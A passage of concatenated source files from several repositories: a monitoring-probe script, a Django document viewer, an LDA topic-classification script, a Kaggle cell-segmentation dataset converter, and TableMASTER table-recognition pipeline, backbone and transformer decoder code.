# sentTime = current time? Or the same timestamp from the metrics?
# need to change the probeId, resourceId and messageId
message = Message(probeId=1, resourceId=101098, messageId=0, sentTime=int(time.time()), data=None)
timestamp = int(time.time())
# append measurement data to message
dt = Data(type="measurement", descriptionId=1, observations=None)
obs = Observation(time=timestamp, value=20000.00001 + 1)
dt.add_observation(observation=obs)
# append data to message
message.add_data(data=dt)
# append event data to message
dt = Data(type="event", descriptionId=2, observations=None)
obs = Observation(time=timestamp, value=-1)
dt.add_observation(observation=obs)
# append data to message
message.add_data(data=dt)
# return message formatted in json
return json.dumps(message.reprJSON(), cls=ComplexEncoder)
if __name__ == '__main__':
# receive the container name and server url as parameters
url = str(sys.argv[1] + '')
communication = Communication(url)
while 1:
message_formated = create_message()
response=communication.send_message(message_formated)
#response=send_message(url, message_formated)
time.sleep(1)
print (response.text)
```
|
{
"source": "jessmed/TFG",
"score": 2
}
|
#### File: DocViewer/mi_aplicacion/views.py
```python
from django.shortcuts import render, HttpResponse,redirect
from django.views import generic
import os
import json
WORK_DIR = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '../..'))
# View for the viewer index
def index(request):
dir = WORK_DIR
return render(request,'index.html')
# View for the document list
def doclist(request):
path = WORK_DIR + "\\final_database\\text"
    # Remove the file extension so it can be displayed as a list
docs = [os.path.splitext(filename)[0] for filename in os.listdir(path)]
    # Split the list into 3 parts so it is easier to display, since there are many files
n = len(docs)//3
docs_list = [docs[i:i + n] for i in range(0, len(docs), n)]
return render(request, 'doclist.html', {'docs_1': docs_list[0],
'docs_2': docs_list[1],
'docs_3': docs_list[2]})
# View to display the statistics obtained from the LDA algorithm
def statistics(request):
s = "stat.html"
return render(request,'statistics.html',{'s': s})
# View to display a document: read the JSON associated with the one clicked
# and extract its fields from the JSON to return them
def document(request):
    # Get the name of the paper that was clicked
paper_id = request.GET.get("doc")
mode = request.GET.get("mode")
path = WORK_DIR + "\\final_database\\"+mode+"\\"+paper_id+".json"
path_colors = WORK_DIR + "\\final_database\\topic_color.json"
json_data = open(path)
json_colors = open(path_colors)
obj = json.load(json_data) # deserialises it
obj_colors = json.load(json_colors)
title = obj["title"]
abstract = obj["abstract"]
json_data.close()
return render(request, 'document_base.html', {'paper_id': paper_id,
'title':title,
'abstract':abstract,
'mode':mode,
'obj_colors':obj_colors})
#-------------------------------------------------------------------------
```
#### File: TFG/src/topic_clasification.py
```python
import time
import numpy as np #version 1.20.3
import json
import os
#Gensim
import gensim
import gensim.corpora as corpora
from gensim.utils import simple_preprocess
#spacy
import spacy
from nltk.corpus import stopwords
#vis
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
from os import listdir
# Load a potentially pretrained model from disk.
from gensim.test.utils import datapath
# --------------------------------------------------------------
WORK_DIR = os.path.dirname(os.path.abspath(__file__)) # current working directory # apply the common-word filter
NUM_TOPICS=15 # number of topics in the trained LDA model
# Load the topic-colour mapping JSON
color_list = json.load(open(WORK_DIR + "\\final_database\\topic_color.json"))
nlp = spacy.load("en_core_web_sm", disable=["parser", "ner"])
"""
Para cada documento de la base de datos realizaremos los siguientes pasos:
1. Cargamos el modelo preentrenado LDA
2. Para cada documento de la base de datos lo convertimos en un BoW
para poder usar los métodos del modelo
3. Calculamos la probabilidad para cada documento o frase de cada documento
4. Lo añadimos a los archivos para que puedan leerse correctamente por el servidor
"""
stopwords = stopwords.words("english")
stopwords.extend(['well','such','other','as','many','have','from', 'subject', 're', 'edu', 'use', 'not', 'would', 'say', 'could', '_', 'be', 'know', 'good', 'go', 'get', 'do', 'done', 'try', 'many', 'some', 'nice', 'thank', 'think', 'see', 'rather', 'easy', 'easily', 'lot', 'lack', 'make', 'want', 'seem', 'run', 'need', 'right', 'line', 'even', 'also', 'may', 'take', 'come'])
# # =============================================================================
# # LEMMATIZATION
# # =============================================================================
def lemmatization(texts, allowed_postags=["NOUN", "ADJ", "VERB", "ADV"]):
texts_out = []
doc = nlp(texts)
new_text = []
for token in doc:
if token.pos_ in allowed_postags:
new_text.append(token.lemma_)
final = " ".join(new_text)
texts_out.append(final)
return (texts_out)
def gen_words(lenm_texts):
word_list = [[word for word in simple_preprocess(str(doc)) if word not in stopwords] for doc in lenm_texts]
return (word_list)
def term2id(dic,term):
for i,v in dic.token2id.items():
if i == term:
return v
# =============================================================================
# 1. LOAD THE PRE-TRAINED LDA MODEL
# =============================================================================
temp_file = datapath("model")
lda = gensim.models.LdaModel.load(temp_file)
print("Modelo cargado")
d = WORK_DIR + "\\final_database\\lda_dictionary\\dictionary.txtdic"
load_dic = corpora.Dictionary.load(d)
# =============================================================================
# 2. FOR EACH DOCUMENT IN THE DATABASE
# =============================================================================
# Function that converts a text into an output used to compute the probability
# of belonging to a topic
def doc_2_bow(textos):
lemmatized_texts = lemmatization(textos)
data_words = gen_words(lemmatized_texts)
dic = corpora.Dictionary(data_words)
corpus = []
for text in data_words:
new = dic.doc2bow(text)
corpus.append(new)
return corpus
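# Hedged sketch (toy input; exact token ids depend on the locally built dictionary):
# doc_2_bow("Cats chase small mice") lemmatizes the text, drops stopwords and returns
# something like [[(0, 1), (1, 1), (2, 1), (3, 1)]], i.e. one (token_id, count) bag per text.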
# Record the execution start time
inicio = time.time()
# =============================================================================
# PROBABILITY COMPUTATION
# =============================================================================
# FULL TEXTS
w = WORK_DIR + "\\final_database\\text"
onlyfiles = listdir(w)
cont = 1
CICLOS = len(onlyfiles)
# For each file in the TEXT database
for file in onlyfiles:
if cont % 10000 == 0:
print("{}/{}".format(cont,CICLOS))
obj = json.load(open(w+"/"+file))
    # For each text section of the abstract (in text mode there is only 1 section)
    for t in obj["abstract"]:
        text = t["text"]
        # Convert it into a BoW
        corpus = doc_2_bow(text)
        # Get the topic-per-document probability matrix from the model
        topic_distribution_document = lda.get_document_topics(corpus,minimum_probability=None)
        # Get the topic with the highest probability
        main_topic = str(max(topic_distribution_document[0],key=lambda item:item[1])[0])
        # Add the topic and its associated colour to the document's JSON
        obj["abstract"][0]["topic"] = main_topic
        obj["abstract"][0]["color"] = color_list[str(main_topic)]
    # Save the preprocessed JSON doc to the new FULL TEXT folder
open(w+"/"+file, "w").write(
json.dumps(obj, indent=4, separators=(',', ': '))
)
cont +=1
print("TEXTOS COMPLETOS CLASIFICADOS")
# SENTENCE-LEVEL TEXTS
q = WORK_DIR + "\\final_database\\phrases"
onlyfiles = listdir(q)
cont = 1
# For each file in the PHRASES database
for file in onlyfiles:
if cont % 100 == 0:
print(cont)
obj = json.load(open(q+"/"+file))
    # For each text section of the abstract (in text mode there is only 1 section)
for t in obj["abstract"]:
text = t["text"]
        # Get the list of terms
        term_list = gen_words(lemmatization(text))
        # Get the corpus of the document
        corpus = doc_2_bow(text)
        # Get the topic-per-document probability list from the model
        p_x_d = lda.get_document_topics(corpus,minimum_probability=None)
        # Get the term-per-topic probability matrix from the model
        p_t_x = lda.get_topics()
        # Create the probability matrix (number of model topics x number of terms in the sentence)
        matrix_p = np.zeros((NUM_TOPICS,len(term_list[0])))
        # For each lemmatized word of the sentence, look at its probability of belonging to each topic;
        # a 1e-8 filter is used
col = 0
for w in term_list[0]:
            # Compute the identifier of the term in the corpus
            w_id = term2id(load_dic, w)
            # If the term exists in the corpus, compute its probability
            if w_id is not None:
                # For each topic that appears in relation to the document
                for k in p_x_d[0]:
                    n_topic, prob = k
                    # For this term, compute its probability according to the topic
                    prob_termino = prob * p_t_x[n_topic][w_id]
matrix_p[n_topic][col] = prob_termino
col+=1
        # Normalize
        suma = 0
        # Sum each column of the (term x topic) matrix,
        # then divide every non-zero entry of a column by that column's total
        s = np.sum(matrix_p, axis=0)
        # Normalize by dividing each column by its total
filas,columnas = matrix_p.shape
for i in range(filas):
for j in range(columnas):
if matrix_p[i,j] != 0:
matrix_p[i][j] = matrix_p[i][j] / s[j]
        # Apply logarithms to avoid underflow
matrix_p=np.log(matrix_p,where=0<matrix_p)
matrix_p = np.sum(matrix_p, axis=1)
        # It can happen that the whole sentence is made up of words outside the model's
        # corpus, in which case it belongs to no topic and cannot be classified;
        # in that case we assign topic 0, which means undefined
total = np.sum(matrix_p)
if total != 0:
main_topic = matrix_p.argmax() +1
else:
main_topic=0
        # Add the topic and its associated colour to the document's JSON
t["topic"]= str(main_topic)
t["color"] = color_list[str(main_topic)]
    # Save the preprocessed JSON doc to the PHRASES folder
open(q+"/"+file, "w").write(
json.dumps(obj, indent=4, separators=(',', ': '))
)
cont +=1
print("TEXTOS POR FRASES CLASIFICADOS")
```
|
{
"source": "Jessmin/mmdetection-Competition",
"score": 2
}
|
#### File: mmdetection-Competition/Sartorius/convert_dataset.py
```python
from sklearn.model_selection import train_test_split
import pandas as pd
import numpy as np
from tqdm import tqdm
from pycocotools import mask as maskUtils
import json
base_dir = '/home/zhaohj/Documents/dataset/Kaggle/sartorius-cell-instance-segmentation'
def get_info(df):
cat_ids = {name: id+1 for id, name in enumerate(df.cell_type.unique())}
cats = [{'name': name, 'id': id} for name, id in cat_ids.items()]
return cat_ids, cats
def coco_structure(df, cat_ids, cats):
images = [{'id': id, 'width': row.width, 'height': row.height, 'file_name': f'train/{id}.png'}
for id, row in df.groupby('id').agg('first').iterrows()]
annotations = []
for idx, row in tqdm(df.iterrows(), total=len(df)):
mask = rle2mask(row['annotation'], row['width'], row['height'])
c_rle = maskUtils.encode(mask)
c_rle['counts'] = c_rle['counts'].decode('utf-8')
area = maskUtils.area(c_rle).item()
bbox = maskUtils.toBbox(c_rle).astype(int).tolist()
annotation = {
'segmentation': c_rle,
'bbox': bbox,
'area': area,
'image_id': row['id'],
'category_id': cat_ids[row['cell_type']],
'iscrowd': 0,
'id': idx
}
annotations.append(annotation)
return {'categories': cats, 'images': images, 'annotations': annotations}
def rle2mask(rle, img_w, img_h):
array = np.fromiter(rle.split(), dtype=np.uint)
array = array.reshape((-1, 2)).T
array[0] = array[0] - 1
    starts, lengths = array
    mask_decompressed = np.concatenate(
        [np.arange(s, s + l, dtype=np.uint) for s, l in zip(starts, lengths)])
msk_img = np.zeros(img_w * img_h, dtype=np.uint8)
msk_img[mask_decompressed] = 1
msk_img = msk_img.reshape((img_h, img_w))
msk_img = np.asfortranarray(msk_img)
return msk_img
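# Hedged sanity check for rle2mask (toy values, not real competition data; kept commented out):
# m = rle2mask("1 3 7 2", img_w=3, img_h=3)
# assert m.shape == (3, 3) and m.sum() == 5   # runs of length 3 and 2 -> five pixels set to 1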
def run():
df = pd.read_csv(f'{base_dir}/train.csv')
cat_ids, cats = get_info(df)
print(cats)
# train_df, val_df = train_test_split(df, train_size=0.9, random_state=0)
# train = coco_structure(train_df, cat_ids, cats)
# val = coco_structure(val_df, cat_ids, cats)
# with open(f'{base_dir}/COCO/train.json', 'w') as f:
# json.dump(train, f, ensure_ascii=True, indent=4)
# with open(f'{base_dir}/COCO/val.json', 'w') as f:
# json.dump(val, f, ensure_ascii=True, indent=4)
run()
```
|
{
"source": "Jessmin/TableMASTER-mmocr",
"score": 3
}
|
#### File: datasets/pipelines/table_transforms.py
```python
from mmdet.datasets.builder import PIPELINES
import os
import cv2
import random
import numpy as np
def visual_table_resized_bbox(results):
bboxes = results['img_info']['bbox']
img = results['img']
for bbox in bboxes:
img = cv2.rectangle(img, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), (0, 255, 0), thickness=1)
return img
def visual_table_xywh_bbox(results):
img = results['img']
bboxes = results['img_info']['bbox']
for bbox in bboxes:
draw_bbox = np.empty_like(bbox)
draw_bbox[0] = bbox[0] - bbox[2] / 2
draw_bbox[1] = bbox[1] - bbox[3] / 2
draw_bbox[2] = bbox[0] + bbox[2] / 2
draw_bbox[3] = bbox[1] + bbox[3] / 2
img = cv2.rectangle(img, (int(draw_bbox[0]), int(draw_bbox[1])), (int(draw_bbox[2]), int(draw_bbox[3])), (0, 255, 0), thickness=1)
return img
@PIPELINES.register_module()
class TableResize:
"""Image resizing and padding for Table Recognition OCR, Table Structure Recognition.
Args:
height (int | tuple(int)): Image height after resizing.
min_width (none | int | tuple(int)): Image minimum width
after resizing.
max_width (none | int | tuple(int)): Image maximum width
after resizing.
keep_aspect_ratio (bool): Keep image aspect ratio if True
during resizing, Otherwise resize to the size height *
max_width.
img_pad_value (int): Scalar to fill padding area.
width_downsample_ratio (float): Downsample ratio in horizontal
direction from input image to output feature.
backend (str | None): The image resize backend type. Options are `cv2`,
`pillow`, `None`. If backend is None, the global imread_backend
specified by ``mmcv.use_backend()`` will be used. Default: None.
"""
def __init__(self,
img_scale=None,
min_size=None,
ratio_range=None,
interpolation=None,
keep_ratio=True,
long_size=None):
self.img_scale = img_scale
self.min_size = min_size
self.ratio_range = ratio_range
self.interpolation = cv2.INTER_LINEAR
self.long_size = long_size
self.keep_ratio = keep_ratio
def _get_resize_scale(self, w, h):
if self.keep_ratio:
if self.img_scale is None and isinstance(self.ratio_range, list):
choice_ratio = random.uniform(self.ratio_range[0], self.ratio_range[1])
return (int(w * choice_ratio), int(h * choice_ratio))
elif isinstance(self.img_scale, tuple) and -1 in self.img_scale:
if self.img_scale[0] == -1:
resize_w = w / h * self.img_scale[1]
return (int(resize_w), self.img_scale[1])
else:
resize_h = h / w * self.img_scale[0]
return (self.img_scale[0], int(resize_h))
else:
return (int(w), int(h))
else:
if isinstance(self.img_scale, tuple):
return self.img_scale
else:
raise NotImplementedError
def _resize_bboxes(self, results):
img_shape = results['img_shape']
if 'img_info' in results.keys():
# train and validate phase
if results['img_info'].get('bbox', None) is not None:
bboxes = results['img_info']['bbox']
scale_factor = results['scale_factor']
# bboxes[..., 0::2], bboxes[..., 1::2] = \
# bboxes[..., 0::2] * scale_factor[1], bboxes[..., 1::2] * scale_factor[0]
bboxes[..., 0::2] = np.clip(bboxes[..., 0::2] * scale_factor[1], 0, img_shape[1]-1)
bboxes[..., 1::2] = np.clip(bboxes[..., 1::2] * scale_factor[0], 0, img_shape[0]-1)
results['img_info']['bbox'] = bboxes
else:
raise ValueError('results should have bbox keys.')
else:
# testing phase
pass
def _resize_img(self, results):
img = results['img']
h, w, _ = img.shape
if self.min_size is not None:
if w > h:
w = self.min_size / h * w
h = self.min_size
else:
h = self.min_size / w * h
w = self.min_size
if self.long_size is not None:
if w < h:
w = self.long_size / h * w
h = self.long_size
else:
h = self.long_size / w * h
w = self.long_size
img_scale = self._get_resize_scale(w, h)
resize_img = cv2.resize(img, img_scale, interpolation=self.interpolation)
scale_factor = (resize_img.shape[0] / img.shape[0], resize_img.shape[1] / img.shape[1])
results['img'] = resize_img
results['img_shape'] = resize_img.shape
results['pad_shape'] = resize_img.shape
results['scale_factor'] = scale_factor
results['keep_ratio'] = self.keep_ratio
def __call__(self, results):
self._resize_img(results)
self._resize_bboxes(results)
return results
@PIPELINES.register_module()
class TablePad:
"""Pad the image & mask.
Two padding modes:
(1) pad to fixed size.
(2) pad to the minium size that is divisible by some number.
"""
def __init__(self,
size=None,
size_divisor=None,
pad_val=None,
keep_ratio=False,
return_mask=False,
mask_ratio=2,
train_state=True,
):
self.size = size[::-1]
self.size_divisor = size_divisor
self.pad_val = pad_val
self.keep_ratio = keep_ratio
self.return_mask = return_mask
self.mask_ratio = mask_ratio
self.training = train_state
# only one of size or size_divisor is valid.
assert size is not None or size_divisor is not None
assert size is None or size_divisor is None
def _pad(self, img, size, pad_val):
if not isinstance(size, tuple):
raise NotImplementedError
if len(size) < len(img.shape):
shape = size + (img.shape[-1], )
else:
shape = size
pad = np.empty(shape, dtype=img.dtype)
pad[...] = pad_val
h, w = img.shape[:2]
size_w, size_h = size[:2]
if h > size_h or w > size_w:
if self.keep_ratio:
if h / size_h > w / size_w:
size = (int(w / h * size_h), size_h)
else:
size = (size_w, int(h / w * size_w))
            img = cv2.resize(img, size[::-1], interpolation=cv2.INTER_LINEAR)
pad[:img.shape[0], :img.shape[1], ...] = img
if self.return_mask:
mask = np.empty(size, dtype=img.dtype)
mask[...] = 0
mask[:img.shape[0], :img.shape[1]] = 1
# mask_ratio is mean stride of backbone in (height, width)
if isinstance(self.mask_ratio, int):
mask = mask[::self.mask_ratio, ::self.mask_ratio]
elif isinstance(self.mask_ratio, tuple):
mask = mask[::self.mask_ratio[0], ::self.mask_ratio[1]]
else:
raise NotImplementedError
mask = np.expand_dims(mask, axis=0)
else:
mask = None
return pad, mask
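    # Note on the returned mask (only built when return_mask=True): it is 1 over the region
    # covered by the resized image and 0 over the padding, then subsampled by mask_ratio
    # (the assumed backbone stride) and given a leading channel dimension.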
def _divisor(self, img, size_divisor, pad_val):
pass
def _pad_img(self, results):
if self.size is not None:
padded_img, mask = self._pad(results['img'], self.size, self.pad_val)
elif self.size_divisor is not None:
raise NotImplementedError
results['img'] = padded_img
results['mask'] = mask
results['pad_shape'] = padded_img.shape
results['pad_fixed_size'] = self.size
results['pad_size_divisor'] = self.size_divisor
def __call__(self, results):
self._pad_img(results)
#visual_img = visual_table_resized_bbox(results)
#cv2.imwrite('/data_0/cache/{}_visual.jpg'.format(os.path.basename(results['filename']).split('.')[0]), visual_img)
# if self.training:
# scaleBbox(results)
return results
def __repr__(self):
repr_str = self.__class__.__name__
repr_str += '(size={}, size_divisor={}, pad_val={})'.format(
self.size, self.size_divisor, self.pad_val)
return repr_str
def xyxy2xywh(bboxes):
"""
Convert coord (x1,y1,x2,y2) to (x,y,w,h).
where (x1,y1) is top-left, (x2,y2) is bottom-right.
(x,y) is bbox center and (w,h) is width and height.
:param bboxes: (x1, y1, x2, y2)
:return:
"""
new_bboxes = np.empty_like(bboxes)
new_bboxes[..., 0] = (bboxes[..., 0] + bboxes[..., 2]) / 2 # x center
new_bboxes[..., 1] = (bboxes[..., 1] + bboxes[..., 3]) / 2 # y center
new_bboxes[..., 2] = bboxes[..., 2] - bboxes[..., 0] # width
new_bboxes[..., 3] = bboxes[..., 3] - bboxes[..., 1] # height
return new_bboxes
def normalize_bbox(bboxes, img_shape):
bboxes[..., 0], bboxes[..., 2] = bboxes[..., 0] / img_shape[1], bboxes[..., 2] / img_shape[1]
bboxes[..., 1], bboxes[..., 3] = bboxes[..., 1] / img_shape[0], bboxes[..., 3] / img_shape[0]
return bboxes
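# Hedged worked example (toy numbers): xyxy2xywh turns (x1, y1, x2, y2) = (10, 20, 30, 60)
# into center-format (20, 40, 20, 40); normalize_bbox then divides x/width values by the
# image width and y/height values by the image height, giving coordinates in [0, 1].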
@PIPELINES.register_module()
class TableBboxEncode:
"""Encode table bbox for training.
convert coord (x1,y1,x2,y2) to (x,y,w,h)
normalize to (0,1)
adjust key 'bbox' and 'bbox_mask' location in dictionary 'results'
"""
def __init__(self):
pass
def __call__(self, results):
bboxes = results['img_info']['bbox']
bboxes = xyxy2xywh(bboxes)
img_shape = results['img'].shape
bboxes = normalize_bbox(bboxes, img_shape)
flag = self.check_bbox_valid(bboxes)
if not flag:
print('Box invalid in {}'.format(results['filename']))
results['img_info']['bbox'] = bboxes
self.adjust_key(results)
# self.visual_normalized_bbox(results)
return results
def __repr__(self):
repr_str = self.__class__.__name__
return repr_str
def check_bbox_valid(self, bboxes):
low = (bboxes >= 0.) * 1
high = (bboxes <= 1.) * 1
matrix = low + high
for idx, m in enumerate(matrix):
if m.sum() != 8:
return False
return True
def visual_normalized_bbox(self, results):
"""
visual after normalized bbox in results.
:param results:
:return:
"""
save_path = '/data_0/cache/{}_normalized.jpg'.\
format(os.path.basename(results['filename']).split('.')[0])
img = results['img']
img_shape = img.shape
# x,y,w,h
bboxes = results['img_info']['bbox']
bboxes[..., 0::2] = bboxes[..., 0::2] * img_shape[1]
bboxes[..., 1::2] = bboxes[..., 1::2] * img_shape[0]
# x,y,x,y
new_bboxes = np.empty_like(bboxes)
new_bboxes[..., 0] = bboxes[..., 0] - bboxes[..., 2] / 2
new_bboxes[..., 1] = bboxes[..., 1] - bboxes[..., 3] / 2
new_bboxes[..., 2] = bboxes[..., 0] + bboxes[..., 2] / 2
new_bboxes[..., 3] = bboxes[..., 1] + bboxes[..., 3] / 2
# draw
for new_bbox in new_bboxes:
img = cv2.rectangle(img, (int(new_bbox[0]), int(new_bbox[1])),
(int(new_bbox[2]), int(new_bbox[3])), (0, 255, 0), thickness=1)
cv2.imwrite(save_path, img)
def adjust_key(self, results):
"""
Adjust key 'bbox' and 'bbox_mask' location in dictionary 'results'.
:param results:
:return:
"""
bboxes = results['img_info'].pop('bbox')
bboxes_masks = results['img_info'].pop('bbox_masks')
results['bbox'] = bboxes
results['bbox_masks'] = bboxes_masks
return results
```
#### File: textrecog/backbones/resnet_extra.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmdet.models.builder import BACKBONES
from ..layers.context_block import ContextBlock
def conv3x3(in_planes, out_planes, stride=1):
""" 3x3 convolution with padding """
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)
def conv1x1(in_planes, out_planes, stride=1):
""" 1x1 convolution """
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, gcb_config=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes, momentum=0.9)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes, momentum=0.9)
self.downsample = downsample
self.stride = stride
self.gcb_config = gcb_config
if self.gcb_config is not None:
gcb_ratio = gcb_config['ratio']
gcb_headers = gcb_config['headers']
att_scale = gcb_config['att_scale']
fusion_type = gcb_config['fusion_type']
self.context_block = ContextBlock(inplanes=planes,
ratio=gcb_ratio,
headers=gcb_headers,
att_scale=att_scale,
fusion_type=fusion_type)
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.gcb_config is not None:
out = self.context_block(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
def get_gcb_config(gcb_config, layer):
if gcb_config is None or not gcb_config['layers'][layer]:
return None
else:
return gcb_config
@BACKBONES.register_module()
class ResNetExtra(nn.Module):
def __init__(self, layers, input_dim=3, gcb_config=None):
assert len(layers) >= 4
super(ResNetExtra, self).__init__()
self.inplanes = 128
self.conv1 = nn.Conv2d(input_dim, 64, kernel_size=3, stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu1 = nn.ReLU(inplace=True)
self.conv2 = nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(128)
self.relu2 = nn.ReLU(inplace=True)
self.maxpool1 = nn.MaxPool2d(kernel_size=2, stride=2)
self.layer1 = self._make_layer(BasicBlock, 256, layers[0], stride=1, gcb_config=get_gcb_config(gcb_config, 0))
self.conv3 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1, bias=False)
self.bn3 = nn.BatchNorm2d(256)
self.relu3 = nn.ReLU(inplace=True)
self.maxpool2 = nn.MaxPool2d(kernel_size=2, stride=2)
self.layer2 = self._make_layer(BasicBlock, 256, layers[1], stride=1, gcb_config=get_gcb_config(gcb_config, 1))
self.conv4 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1, bias=False)
self.bn4 = nn.BatchNorm2d(256)
self.relu4 = nn.ReLU(inplace=True)
self.maxpool3 = nn.MaxPool2d(kernel_size=(2,1), stride=(2,1))
self.layer3 = self._make_layer(BasicBlock, 512, layers[2], stride=1, gcb_config=get_gcb_config(gcb_config, 2))
self.conv5 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1, bias=False)
self.bn5 = nn.BatchNorm2d(512)
self.relu5 = nn.ReLU(inplace=True)
self.layer4 = self._make_layer(BasicBlock, 512, layers[3], stride=1, gcb_config=get_gcb_config(gcb_config, 3))
self.conv6 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1, bias=False)
self.bn6 = nn.BatchNorm2d(512)
self.relu6 = nn.ReLU(inplace=True)
def init_weights(self, pretrained=None):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def _make_layer(self, block, planes, blocks, stride=1, gcb_config=None):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, gcb_config=gcb_config))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
f = []
x = self.conv1(x)
x = self.bn1(x)
x = self.relu1(x)
x = self.conv2(x)
x = self.bn2(x)
x = self.relu2(x)
# (48, 160)
x = self.maxpool1(x)
x = self.layer1(x)
x = self.conv3(x)
x = self.bn3(x)
x = self.relu3(x)
f.append(x)
# (24, 80)
x = self.maxpool2(x)
x = self.layer2(x)
x = self.conv4(x)
x = self.bn4(x)
x = self.relu4(x)
f.append(x)
# (12, 40)
x = self.maxpool3(x)
x = self.layer3(x)
x = self.conv5(x)
x = self.bn5(x)
x = self.relu5(x)
x = self.layer4(x)
x = self.conv6(x)
x = self.bn6(x)
x = self.relu6(x)
f.append(x)
# (6, 40)
return f
```
#### File: textrecog/decoders/master_decoder.py
```python
import math
import copy
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmocr.models.builder import DECODERS
from .base_decoder import BaseDecoder
from ..encoders.positional_encoding import PositionalEncoding
from mmocr.models.builder import DECODERS
class Embeddings(nn.Module):
def __init__(self, d_model, vocab):
super(Embeddings, self).__init__()
self.lut = nn.Embedding(vocab, d_model)
self.d_model = d_model
def forward(self, *input):
x = input[0]
return self.lut(x) * math.sqrt(self.d_model)
def clones(module, N):
""" Produce N identical layers """
return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])
class SubLayerConnection(nn.Module):
"""
A residual connection followed by a layer norm.
Note for code simplicity the norm is first as opposed to last.
"""
def __init__(self, size, dropout):
super(SubLayerConnection, self).__init__()
self.norm = nn.LayerNorm(size)
self.dropout = nn.Dropout(dropout)
    def forward(self, x, sublayer):
        # apply pre-norm, the sublayer and dropout once, then add the residual
        return x + self.dropout(sublayer(self.norm(x)))
class FeedForward(nn.Module):
def __init__(self, d_model, d_ff, dropout):
super(FeedForward, self).__init__()
self.w_1 = nn.Linear(d_model, d_ff)
self.w_2 = nn.Linear(d_ff, d_model)
self.dropout = nn.Dropout(dropout)
def forward(self, x):
return self.w_2(self.dropout(F.relu(self.w_1(x))))
def self_attention(query, key, value, mask=None, dropout=None):
"""
Compute 'Scale Dot Product Attention'
"""
d_k = value.size(-1)
score = torch.matmul(query, key.transpose(-2, -1) / math.sqrt(d_k))
if mask is not None:
#score = score.masked_fill(mask == 0, -1e9) # b, h, L, L
score = score.masked_fill(mask == 0, -6.55e4) # for fp16
p_attn = F.softmax(score, dim=-1)
if dropout is not None:
p_attn = dropout(p_attn)
return torch.matmul(p_attn, value), p_attn
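# Hedged shape note (typical sizes are an assumption): for query/key/value of shape
# (batch, heads, L, d_k), `score` is (batch, heads, L, L); masked positions are filled with a
# large negative value before softmax, and the returned context keeps shape (batch, heads, L, d_k).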
class MultiHeadAttention(nn.Module):
def __init__(self, headers, d_model, dropout):
super(MultiHeadAttention, self).__init__()
assert d_model % headers == 0
self.d_k = int(d_model / headers)
self.headers = headers
self.linears = clones(nn.Linear(d_model, d_model), 4)
self.attn = None
self.dropout = nn.Dropout(dropout)
def forward(self, query, key, value, mask=None):
nbatches = query.size(0)
# 1) Do all the linear projections in batch from d_model => h x d_k
query, key, value = \
[l(x).view(nbatches, -1, self.headers, self.d_k).transpose(1, 2)
for l,x in zip(self.linears, (query, key, value))]
# 2) Apply attention on all the projected vectors in batch
x, self.attn = self_attention(query, key, value, mask=mask, dropout=self.dropout)
x = x.transpose(1, 2).contiguous().view(nbatches, -1, self.headers * self.d_k)
return self.linears[-1](x)
class DecoderLayer(nn.Module):
"""
Decoder is made of self attention, srouce attention and feed forward.
"""
def __init__(self, size, self_attn, src_attn, feed_forward, dropout):
super(DecoderLayer, self).__init__()
self.size = size
self.self_attn = MultiHeadAttention(**self_attn)
self.src_attn = MultiHeadAttention(**src_attn)
self.feed_forward = FeedForward(**feed_forward)
self.sublayer = clones(SubLayerConnection(size, dropout), 3)
def forward(self, x, feature, src_mask, tgt_mask):
x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, tgt_mask))
x = self.sublayer[1](x, lambda x: self.src_attn(x, feature, feature, src_mask))
return self.sublayer[2](x, self.feed_forward)
@DECODERS.register_module()
class MasterDecoder(BaseDecoder):
def __init__(self,
N,
decoder,
d_model,
num_classes,
start_idx,
padding_idx,
max_seq_len,
):
super(MasterDecoder, self).__init__()
self.layers = clones(DecoderLayer(**decoder), N)
self.norm = nn.LayerNorm(decoder.size)
self.fc = nn.Linear(d_model, num_classes)
self.embedding = Embeddings(d_model=d_model, vocab=num_classes)
self.positional_encoding = PositionalEncoding(d_model=d_model)
self.SOS = start_idx
self.PAD = padding_idx
self.max_length = max_seq_len
def make_mask(self, src, tgt):
"""
Make mask for self attention.
:param src: [b, c, h, l_src]
:param tgt: [b, l_tgt]
:return:
"""
trg_pad_mask = (tgt != self.PAD).unsqueeze(1).unsqueeze(3).byte()
tgt_len = tgt.size(1)
trg_sub_mask = torch.tril(torch.ones((tgt_len, tgt_len), dtype=torch.uint8, device=src.device))
tgt_mask = trg_pad_mask & trg_sub_mask
return None, tgt_mask
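    # Hedged shape sketch for make_mask (sizes are illustrative): for a target batch of shape
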